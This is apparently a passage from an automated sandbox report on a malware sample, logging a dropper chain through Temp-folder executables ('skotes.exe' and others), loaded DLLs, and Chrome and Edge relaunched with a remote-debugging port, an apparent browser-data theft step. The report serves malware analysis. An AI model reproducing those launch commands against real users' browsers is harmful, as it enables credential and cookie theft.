BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: L8ChrKrbqV.exe

Virustotal: Detection: 47%

Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe

File read: C:\Users\user\Desktop\L8ChrKrbqV.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\L8ChrKrbqV.exe "C:\Users\user\Desktop\L8ChrKrbqV.exe"
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process created: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe "C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe"
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process created: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe "C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe"
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2208,i,3989964441528239417,17978033501592239035,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2096,i,5225765987190299877,16873338386739296826,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2244,i,2454103829531632188,12512779967971842142,262144 /prefetch:3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe "C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe "C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe "C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe"
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process created: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe "C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe"	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process created: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe "C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2208,i,3989964441528239417,17978033501592239035,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2096,i,5225765987190299877,16873338386739296826,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2244,i,2454103829531632188,12512779967971842142,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe "C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe "C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe "C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe"

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
